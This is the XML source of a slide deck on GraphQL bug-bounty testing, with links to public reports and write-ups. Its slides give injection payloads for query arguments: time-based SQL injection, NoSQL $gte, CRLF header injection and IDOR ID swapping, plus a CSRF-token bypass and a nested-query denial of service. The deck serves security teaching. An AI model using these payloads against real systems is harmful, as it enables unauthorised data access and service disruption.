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4"/>
    <p:sldMasterId id="214748368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Lato"/>
      <p:regular r:id="rId26"/>
      <p:bold r:id="rId27"/>
      <p:italic r:id="rId28"/>
      <p:boldItalic r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald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slide" Target="slides/slide19.xml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35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack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Oswald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b4b9ded4d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b4b9ded4d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4b9ded4d4_1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4b9ded4d4_1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b4b9ded4d4_1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b4b9ded4d4_1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b4b9ded4d4_1_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b4b9ded4d4_1_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b4b9ded4d4_1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b4b9ded4d4_1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4b9ded4d4_1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4b9ded4d4_1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b4b9ded4d4_1_9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b4b9ded4d4_1_9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b4b9ded4d4_1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b4b9ded4d4_1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b4b9ded4d4_1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b4b9ded4d4_1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4b9ded4d4_1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4b9ded4d4_1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b4b9ded4d4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b4b9ded4d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b4b9ded4d4_1_10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b4b9ded4d4_1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4b9ded4d4_1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b4b9ded4d4_1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4dd9811f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4dd9811f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b4dd9811f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b4dd9811f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b4b9ded4d4_1_9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b4b9ded4d4_1_9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4b9ded4d4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4b9ded4d4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b4b9ded4d4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b4b9ded4d4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b4b9ded4d4_1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b4b9ded4d4_1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699007" y="-20954"/>
            <a:ext cx="77460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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909319" y="-20954"/>
            <a:ext cx="73254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457200" y="1202246"/>
            <a:ext cx="8229600" cy="12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1" i="0" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00FF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>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165205" y="5009234"/>
            <a:ext cx="16788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7" name="Google Shape;117;p2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8" name="Google Shape;118;p2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OBJECT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OBJECT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OBJECT_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OBJECT_5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32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OBJECT_6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33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7">
  <p:cSld name="OBJECT_7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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384725" y="503825"/>
            <a:ext cx="83745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1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442325" y="1176351"/>
            <a:ext cx="8259300" cy="3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8">
  <p:cSld name="OBJECT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5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3" name="Google Shape;163;p35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5" name="Google Shape;165;p3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66" name="Google Shape;166;p35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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487417" y="390906"/>
            <a:ext cx="169200" cy="870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9" name="Google Shape;169;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="791528"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1055370" w="12192000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1054799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EBF0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0" name="Google Shape;170;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="809028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1" name="Google Shape;171;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5123853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EBF0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2" name="Google Shape;172;p36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251022" y="925449"/>
            <a:ext cx="3716100" cy="3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709160" y="1183005"/>
            <a:ext cx="39774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6" name="Google Shape;176;p3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77" name="Google Shape;177;p36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9">
  <p:cSld name="OBJECT_9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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678972" y="720740"/>
            <a:ext cx="57861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 sz="4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736094" y="822578"/>
            <a:ext cx="7139100" cy="24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b="0" i="0" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="115F82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indent="-228600" lvl="1" marL="914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2" name="Google Shape;182;p3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3" name="Google Shape;183;p37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OBJECT_10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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526541" y="2795835"/>
            <a:ext cx="8091000" cy="11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1" i="0" sz="4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6" name="Google Shape;186;p3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7" name="Google Shape;187;p3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88" name="Google Shape;188;p38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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688847" y="473259"/>
            <a:ext cx="77664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" name="Google Shape;191;p39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3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3" name="Google Shape;193;p3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94" name="Google Shape;194;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658368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hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId7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8.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/435066" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/time-based-blind-sql-injection-in-graphql-39a25a1dfb3c" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External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hyperlink" Target="https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/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21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/graphql-idor-leads-to-information-disclosure-175eb560170d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hyperlink" Target="https://twitter.com/m4ll0k/status/1310439013581549568" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://labs.detectify.com/2018/03/14/graphql-abuse/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@edmundaa222/poc-disclose-members-in-any-closed-facebook-group-259783fa4bf" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://rafiem.github.io/bugbounty/tokopedia/site-wide-csrf-graphql/" TargetMode="External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s://twitter.com/m4ll0k/status/1311267464588689408" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/bbuerhaus/status/1281362747616374784" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://philippeharewood.com/facebook-graphql-csrf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hyperlink" Target="https://twitter.com/hacktoryai/status/1311274381566451717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www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External"/><Relationship Id="rId7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lab.com/dee-see/graphql-path-enum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medium.com/csg-govtech/closing-the-loop-practical-attacks-and-defences-for-graphql-apis-138cb667aaff" TargetMode="External"/><Relationship Id="rId6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witter.com/0xAwali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hyperlink" Target="https://github.com/doyensec/inq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blog.usejournal.com/graphql-bug-to-steal-anyones-address-fc34f0374417" TargetMode="External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hyperlink" Target="https://medium.com/@pranaybafna/graphql-introspection-leads-to-sensitive-data-disclosure-65b385452d7f" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/pwnydaemons/status/1295856934130679809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nathanrandal.com/graphql-visualizer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twitter.com/bbuerhaus/status/1281362909822693377" TargetMode="External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npmjs.com/package/gqlg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twitter.com/bbuerhaus/status/1281363019906383875" TargetMode="External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hyperlink" Target="https://www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External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www.youtube.com/watch?v=tJtNTqviOGg" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/489146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medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NPDp7GHmMa0" TargetMode="External"/><Relationship Id="rId7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twitter.com/hacktoryai/status/1311274381566451717" TargetMode="External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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="50847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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="870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201" name="Google Shape;201;p40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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="5350200" cy="23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  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="72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GraphQL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="30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3" name="Google Shape;20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5575" y="1509250"/>
            <a:ext cx="2595150" cy="187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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="50301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 sz="3000">
                <a:solidFill>
                  <a:srgbClr val="42424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 sz="3000">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"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 sz="3000"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6"/>
              </a:rPr>
              <a:t>@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="30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5" name="Google Shape;20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61200" y="4110576"/>
            <a:ext cx="727375" cy="5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Inject Time-Based SQLi Payloads e.g. ' SELECT pg_sleep\(30\);-- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR SLEEP(30 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All The Arguments To Get SQLi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21" name="Google Shape;321;p49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/graphql HTTP/1.1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query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user(name: "me </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' SELECT pg_sleep\(30\);--</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")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edges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    node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	phone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   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 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}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22" name="Google Shape;322;p49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23" name="Google Shape;323;p49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9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25" name="Google Shape;32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025" y="2675525"/>
            <a:ext cx="421000" cy="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49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28" name="Google Shape;328;p49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29" name="Google Shape;329;p4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Inject NoSQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. $gte </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All The Arguments To Get NoSQLi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35" name="Google Shape;335;p50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/graphql HTTP/1.1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query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user(name: "{\"me\":{\"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$gte</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\":\"\"}}")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edges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    node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	phone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   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 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}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36" name="Google Shape;336;p50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37" name="Google Shape;337;p50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50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39" name="Google Shape;33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50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41" name="Google Shape;34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Figure Out Is There Is IDOR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR Not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47" name="Google Shape;347;p51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/graphql HTTP/1.1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query {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user(id: "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID-Of-Another-User</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>") {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	edges {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	     node {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		phone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	     }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	 }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  }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}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48" name="Google Shape;348;p51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49" name="Google Shape;349;p5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5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51" name="Google Shape;35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51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3" name="Google Shape;35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1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5" name="Google Shape;355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827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1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57" name="Google Shape;357;p5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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Carriage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</a:rPr>
              <a:t>Return</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Line Feed e.g. %0A%01%09 With Injecting Headers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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. Host , X-Forwarded-Host </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc In All The Arguments To Get SSRF OR CRLF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63" name="Google Shape;363;p5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/graphql HTTP/1.1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query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user(name: "me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A%01%09Host:%20me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")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edges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    node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	phone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   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 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}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64" name="Google Shape;364;p5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65" name="Google Shape;365;p5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5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67" name="Google Shape;3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5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69" name="Google Shape;36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Append Parameters To Your Queries </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expose Sensitive Information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75" name="Google Shape;375;p5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POST /graphql HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Host: company.com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Content-Length: Number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query {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user(name: "me") {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	edges {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	     node {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		phone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		</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key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	     }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	 }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  }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}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p5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77" name="Google Shape;377;p5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5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79" name="Google Shape;37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5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1" name="Google Shape;381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4" y="2655375"/>
            <a:ext cx="503200" cy="37067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3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83" name="Google Shape;383;p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Figure Out Is There Is CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR Not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89" name="Google Shape;389;p5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/graphql HTTP/1.1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CSRF-Token: *********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query {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user(name: "me") {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	edges {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	     node {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		phone</a:t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	     }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	 }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        }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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90" name="Google Shape;390;p5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91" name="Google Shape;391;p5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5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93" name="Google Shape;39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p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192275" y="3091025"/>
            <a:ext cx="1649700" cy="180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395" name="Google Shape;395;p5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96" name="Google Shape;396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4025" y="2675525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There Is CSRF-Token , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove It</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Use Body Queries As GET Queries</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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Bypass Validation On CSRF Token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02" name="Google Shape;402;p5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GET /graphql?query=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(name: "me")</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{node{phone}}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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403" name="Google Shape;403;p5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04" name="Google Shape;404;p5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5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06" name="Google Shape;4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5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08" name="Google Shape;408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55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0" name="Google Shape;410;p5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11005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55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Blog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12" name="Google Shape;412;p5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25200"/>
            <a:ext cx="4210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Inject Repeated Node In Your Body </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Do DOS Attack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418" name="Google Shape;418;p5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/graphql HTTP/1.1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query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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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edges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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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	…..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   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 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}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419" name="Google Shape;419;p5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20" name="Google Shape;420;p5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5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422" name="Google Shape;42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24" name="Google Shape;42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5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26" name="Google Shape;426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827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32" name="Google Shape;432;p5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434" name="Google Shape;434;p5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Figure Out All The Paths To Reach A Specific Object By Using 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Tools e.g.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graphql-path-enum</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="435" name="Google Shape;43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Steps to produce :-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1 -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Open Your Terminal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2 -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Write This Command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437" name="Google Shape;437;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="3644200"/>
            <a:ext cx="4612800" cy="3150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5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>graphql-path-enum -i introspection.json -t object-word</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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438" name="Google Shape;438;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="3993203"/>
            <a:ext cx="4612800" cy="3150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</a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i introspection.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "	Path To The Full Introspection Query</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="4342206"/>
            <a:ext cx="4612800" cy="3150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</a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-t object-word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "	Object To Look For In The GraphQL</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p5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441" name="Google Shape;441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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="2064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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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675">
            <a:no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b="1" sz="9600">
              <a:solidFill>
                <a:srgbClr val="0B5394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48" name="Google Shape;448;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775"/>
            <a:ext cx="5030100" cy="14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br>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="360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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t> Awali</a:t>
            </a:r>
            <a:b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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1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49" name="Google Shape;449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50" y="4049201"/>
            <a:ext cx="727375" cy="564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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603265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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345700" y="0"/>
